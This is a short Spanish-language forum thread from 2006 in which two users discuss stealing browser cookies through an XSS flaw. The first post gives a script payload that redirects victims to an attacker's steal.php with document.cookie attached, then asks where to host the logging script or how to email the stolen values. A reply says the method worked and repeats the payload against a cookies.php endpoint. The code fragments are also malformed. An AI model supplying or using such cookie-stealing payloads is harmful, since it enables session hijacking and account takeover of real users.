|
Título: Problemas con reenvío de cookies.. en XSS vulnerable. Publicado por: Blixx en 5 Agosto 2006, 11:23 am Hola.. en un escenario típico donde una página es vulnerable a rediregir los navegadores, con el código:
Código: <script>window.location=site.com/steal.php?cookie='+document.cookie;</script> para que luego steal.php grabe la variable cookie.. con el contenido de la cookie en un archivo log.txt digamos.. Pero ahora.. qué sitio permite grabar el texto, con la información obtenida? Es decir, la mayoría de servidores gratuitos no otorgan permiso de escritura en sus archivos.. Habría alguna forma alternativa.. de quizás, enviar el valor de 'cookie' usando steal.php.. pero a algún correo por ejemplo? O usando POST /formulario?=cookie.. Desde dónde podría ver el archivo que registra el steal.php que contiene $cookie = $_GET['cookie'];? Título: Re: Problemas con reenvío de cookies.. en XSS vulnerable. Publicado por: ifcaro en 6 Agosto 2006, 23:14 pm Yo en mi servidor de www.wwwpuntocom.com use este codigo y si m funciono:
guarda la variable ?c= en el archivo steal.php Código: //cookies.php usa el codigo Código: <script>window.location=site.com/cookies.php?c='+document.cookie;</script> |